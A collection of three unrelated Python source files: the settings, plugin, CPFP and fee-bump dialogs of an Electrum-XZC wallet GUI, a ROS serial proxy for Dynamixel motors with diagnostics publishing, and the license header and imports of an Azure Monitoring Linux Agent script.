self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possiblity, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mXZC/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['XZC', 'mXZC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1XZC=1000mXZC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'XZC':
self.decimal_point = 8
elif unit_result == 'mXZC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_xzc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
dynamixel_serial_proxy.py
|
# -*- coding: utf-8 -*-
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2010-2011, Antons Rebguns.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of University of Arizona nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = 'Antons Rebguns'
__copyright__ = 'Copyright (c) 2010-2011 Antons Rebguns'
__credits__ = 'Cody Jorgensen, Cara Slutter'
__license__ = 'BSD'
__maintainer__ = 'Cong Liu'
__email__ = 'liucong.cdhaw@gmail.com'
import math
import sys
import errno
from collections import deque
from threading import Thread
from collections import defaultdict
import roslib
roslib.load_manifest('cyton_xqtor_driver')
import rospy
import dynamixel_io
from cyton_xqtor_driver.dynamixel_const import *
from diagnostic_msgs.msg import DiagnosticArray
from diagnostic_msgs.msg import DiagnosticStatus
from diagnostic_msgs.msg import KeyValue
from dynamixel_msgs.msg import MotorState
from dynamixel_msgs.msg import MotorStateList
class SerialProxy():
def __init__(self,
port_name='/dev/ttyUSB0',
port_namespace='ttyUSB0',
baud_rate='1000000',
min_motor_id=1,
max_motor_id=25,
update_rate=5,
diagnostics_rate=1,
error_level_temp=75,
warn_level_temp=70,
readback_echo=False):
self.port_name = port_name
self.port_namespace = port_namespace
self.baud_rate = baud_rate
self.min_motor_id = min_motor_id
self.max_motor_id = max_motor_id
self.update_rate = update_rate
self.diagnostics_rate = diagnostics_rate
self.error_level_temp = error_level_temp
self.warn_level_temp = warn_level_temp
self.readback_echo = readback_echo
self.actual_rate = update_rate
self.error_counts = {'non_fatal': 0, 'checksum': 0, 'dropped': 0}
self.current_state = MotorStateList()
self.num_ping_retries = 5
self.motor_states_pub = rospy.Publisher('motor_states/%s' % self.port_namespace, MotorStateList, queue_size=1)
self.diagnostics_pub = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=1)
def connect(self):
try:
self.dxl_io = dynamixel_io.DynamixelIO(self.port_name, self.baud_rate, self.readback_echo)
self.__find_motors()
except dynamixel_io.SerialOpenError, e:
rospy.logfatal(e.message)
sys.exit(1)
self.running = True
if self.update_rate > 0: Thread(target=self.__update_motor_states).start()
if self.diagnostics_rate > 0: Thread(target=self.__publish_diagnostic_information).start()
def disconnect(self):
self.running = False
def __fill_motor_parameters(self, motor_id, model_number):
"""
Stores some extra information about each motor on the parameter server.
Some of these paramters are used in joint controller implementation.
"""
angles = self.dxl_io.get_angle_limits(motor_id)
voltage = self.dxl_io.get_voltage(motor_id)
voltages = self.dxl_io.get_voltage_limits(motor_id)
rospy.set_param('dynamixel/%s/%d/model_number' %(self.port_namespace, motor_id), model_number)
rospy.set_param('dynamixel/%s/%d/model_name' %(self.port_namespace, motor_id), DXL_MODEL_TO_PARAMS[model_number]['name'])
rospy.set_param('dynamixel/%s/%d/min_angle' %(self.port_namespace, motor_id), angles['min'])
rospy.set_param('dynamixel/%s/%d/max_angle' %(self.port_namespace, motor_id), angles['max'])
torque_per_volt = DXL_MODEL_TO_PARAMS[model_number]['torque_per_volt']
rospy.set_param('dynamixel/%s/%d/torque_per_volt' %(self.port_namespace, motor_id), torque_per_volt)
rospy.set_param('dynamixel/%s/%d/max_torque' %(self.port_namespace, motor_id), torque_per_volt * voltage)
velocity_per_volt = DXL_MODEL_TO_PARAMS[model_number]['velocity_per_volt']
rpm_per_tick = DXL_MODEL_TO_PARAMS[model_number]['rpm_per_tick']
rospy.set_param('dynamixel/%s/%d/velocity_per_volt' %(self.port_namespace, motor_id), velocity_per_volt)
rospy.set_param('dynamixel/%s/%d/max_velocity' %(self.port_namespace, motor_id), velocity_per_volt * voltage)
rospy.set_param('dynamixel/%s/%d/radians_second_per_encoder_tick' %(self.port_namespace, motor_id), rpm_per_tick * RPM_TO_RADSEC)
encoder_resolution = DXL_MODEL_TO_PARAMS[model_number]['encoder_resolution']
range_degrees = DXL_MODEL_TO_PARAMS[model_number]['range_degrees']
range_radians = math.radians(range_degrees)
rospy.set_param('dynamixel/%s/%d/encoder_resolution' %(self.port_namespace, motor_id), encoder_resolution)
rospy.set_param('dynamixel/%s/%d/range_degrees' %(self.port_namespace, motor_id), range_degrees)
rospy.set_param('dynamixel/%s/%d/range_radians' %(self.port_namespace, motor_id), range_radians)
rospy.set_param('dynamixel/%s/%d/encoder_ticks_per_degree' %(self.port_namespace, motor_id), encoder_resolution / range_degrees)
rospy.set_param('dynamixel/%s/%d/encoder_ticks_per_radian' %(self.port_namespace, motor_id), encoder_resolution / range_radians)
rospy.set_param('dynamixel/%s/%d/degrees_per_encoder_tick' %(self.port_namespace, motor_id), range_degrees / encoder_resolution)
rospy.set_param('dynamixel/%s/%d/radians_per_encoder_tick' %(self.port_namespace, motor_id), range_radians / encoder_resolution)
# keep some parameters around for diagnostics
self.motor_static_info[motor_id] = {}
self.motor_static_info[motor_id]['model'] = DXL_MODEL_TO_PARAMS[model_number]['name']
self.motor_static_info[motor_id]['firmware'] = self.dxl_io.get_firmware_version(motor_id)
self.motor_static_info[motor_id]['delay'] = self.dxl_io.get_return_delay_time(motor_id)
self.motor_static_info[motor_id]['min_angle'] = angles['min']
self.motor_static_info[motor_id]['max_angle'] = angles['max']
self.motor_static_info[motor_id]['min_voltage'] = voltages['min']
self.motor_static_info[motor_id]['max_voltage'] = voltages['max']
def __find_motors(self):
rospy.loginfo('%s: Pinging motor IDs %d through %d...' % (self.port_namespace, self.min_motor_id, self.max_motor_id))
self.motors = []
self.motor_static_info = {}
for motor_id in range(self.min_motor_id, self.max_motor_id + 1):
for trial in range(self.num_ping_retries):
try:
result = self.dxl_io.ping(motor_id)
except Exception as ex:
rospy.logerr('Exception thrown while pinging motor %d - %s' % (motor_id, ex))
continue
if result:
self.motors.append(motor_id)
break
if not self.motors:
rospy.logfatal('%s: No motors found.' % self.port_namespace)
sys.exit(1)
counts = defaultdict(int)
to_delete_if_error = []
for motor_id in self.motors:
for trial in range(self.num_ping_retries):
try:
model_number = self.dxl_io.get_model_number(motor_id)
self.__fill_motor_parameters(motor_id, model_number)
except Exception as ex:
rospy.logerr('Exception thrown while getting attributes for motor %d - %s' % (motor_id, ex))
if trial == self.num_ping_retries - 1: to_delete_if_error.append(motor_id)
continue
counts[model_number] += 1
break
for motor_id in to_delete_if_error:
self.motors.remove(motor_id)
rospy.set_param('dynamixel/%s/connected_ids' % self.port_namespace, self.motors)
status_str = '%s: Found %d motors - ' % (self.port_namespace, len(self.motors))
for model_number,count in counts.items():
if count:
model_name = DXL_MODEL_TO_PARAMS[model_number]['name']
status_str += '%d %s [' % (count, model_name)
for motor_id in self.motors:
if self.motor_static_info[motor_id]['model'] == model_name:
status_str += '%d, ' % motor_id
status_str = status_str[:-2] + '], '
rospy.loginfo('%s, initialization complete.' % status_str[:-2])
def __update_motor_states(self):
num_events = 50
rates = deque([float(self.update_rate)]*num_events, maxlen=num_events)
last_time = rospy.Time.now()
rate = rospy.Rate(self.update_rate)
while not rospy.is_shutdown() and self.running:
# get current state of all motors and publish to motor_states topic
motor_states = []
for motor_id in self.motors:
try:
state = self.dxl_io.get_feedback(motor_id)
if state:
motor_states.append(MotorState(**state))
if dynamixel_io.exception: raise dynamixel_io.exception
except dynamixel_io.FatalErrorCodeError, fece:
rospy.logerr(fece)
except dynamixel_io.NonfatalErrorCodeError, nfece:
self.error_counts['non_fatal'] += 1
rospy.logdebug(nfece)
except dynamixel_io.ChecksumError, cse:
self.error_counts['checksum'] += 1
rospy.logdebug(cse)
except dynamixel_io.DroppedPacketError, dpe:
self.error_counts['dropped'] += 1
rospy.logdebug(dpe.message)
except OSError, ose:
if ose.errno != errno.EAGAIN:
rospy.logfatal(errno.errorcode[ose.errno])
rospy.signal_shutdown(errno.errorcode[ose.errno])
if motor_states:
msl = MotorStateList()
msl.motor_states = motor_states
self.motor_states_pub.publish(msl)
self.current_state = msl
# calculate actual update rate
current_time = rospy.Time.now()
rates.append(1.0 / (current_time - last_time).to_sec())
self.actual_rate = round(sum(rates)/num_events, 2)
last_time = current_time
rate.sleep()
def __publish_diagnostic_information(self):
diag_msg = DiagnosticArray()
rate = rospy.Rate(self.diagnostics_rate)
while not rospy.is_shutdown() and self.running:
diag_msg.status = []
diag_msg.header.stamp = rospy.Time.now()
status = DiagnosticStatus()
status.name = 'Dynamixel Serial Bus (%s)' % self.port_namespace
status.hardware_id = 'Dynamixel Serial Bus on port %s' % self.port_name
status.values.append(KeyValue('Baud Rate', str(self.baud_rate)))
status.values.append(KeyValue('Min Motor ID', str(self.min_motor_id)))
status.values.append(KeyValue('Max Motor ID', str(self.max_motor_id)))
status.values.append(KeyValue('Desired Update Rate', str(self.update_rate)))
status.values.append(KeyValue('Actual Update Rate', str(self.actual_rate)))
status.values.append(KeyValue('# Non Fatal Errors', str(self.error_counts['non_fatal'])))
status.values.append(KeyValue('# Checksum Errors', str(self.error_counts['checksum'])))
status.values.append(KeyValue('# Dropped Packet Errors', str(self.error_counts['dropped'])))
status.level = DiagnosticStatus.OK
status.message = 'OK'
if self.actual_rate - self.update_rate < -5:
status.level = DiagnosticStatus.WARN
status.message = 'Actual update rate is lower than desired'
diag_msg.status.append(status)
for motor_state in self.current_state.motor_states:
mid = motor_state.id
status = DiagnosticStatus()
status.name = 'Robotis Dynamixel Motor %d on port %s' % (mid, self.port_namespace)
status.hardware_id = 'DXL-%d@%s' % (motor_state.id, self.port_namespace)
status.values.append(KeyValue('Model Name', str(self.motor_static_info[mid]['model'])))
status.values.append(KeyValue('Firmware Version', str(self.motor_static_info[mid]['firmware'])))
status.values.append(KeyValue('Return Delay Time', str(self.motor_static_info[mid]['delay'])))
status.values.append(KeyValue('Minimum Voltage', str(self.motor_static_info[mid]['min_voltage'])))
status.values.append(KeyValue('Maximum Voltage', str(self.motor_static_info[mid]['max_voltage'])))
status.values.append(KeyValue('Minimum Position (CW)', str(self.motor_static_info[mid]['min_angle'])))
status.values.append(KeyValue('Maximum Position (CCW)', str(self.motor_static_info[mid]['max_angle'])))
status.values.append(KeyValue('Goal', str(motor_state.goal)))
status.values.append(KeyValue('Position', str(motor_state.position)))
status.values.append(KeyValue('Error', str(motor_state.error)))
status.values.append(KeyValue('Velocity', str(motor_state.speed)))
status.values.append(KeyValue('Load', str(motor_state.load)))
status.values.append(KeyValue('Voltage', str(motor_state.voltage)))
status.values.append(KeyValue('Temperature', str(motor_state.temperature)))
status.values.append(KeyValue('Moving', str(motor_state.moving)))
if motor_state.temperature >= self.error_level_temp:
status.level = DiagnosticStatus.ERROR
status.message = 'OVERHEATING'
elif motor_state.temperature >= self.warn_level_temp:
status.level = DiagnosticStatus.WARN
status.message = 'VERY HOT'
else:
status.level = DiagnosticStatus.OK
status.message = 'OK'
diag_msg.status.append(status)
self.diagnostics_pub.publish(diag_msg)
rate.sleep()
if __name__ == '__main__':
try:
serial_proxy = SerialProxy()
serial_proxy.connect()
rospy.spin()
serial_proxy.disconnect()
except rospy.ROSInterruptException: pass
|
agent.py
|
#!/usr/bin/env python
#
# AzureMonitoringLinuxAgent Extension
#
# Copyright 2019 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, lets skip import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import datetime
import signal
import pwd
import grp
import re
import filecmp
import stat
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import shutil
import crypt
import xml.dom.minidom
import re
import hashlib
from distutils.version import LooseVersion
from hashlib import sha256
from shutil import copyfile
from threading import Thread
import telegraf_utils.telegraf_config_handler as telhandler
import metrics_ext_utils.metrics_constants as metrics_constants
import metrics_ext_utils.metrics_ext_handler as me_handler
import metrics_ext_utils.metrics_common_utils as metrics_utils
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
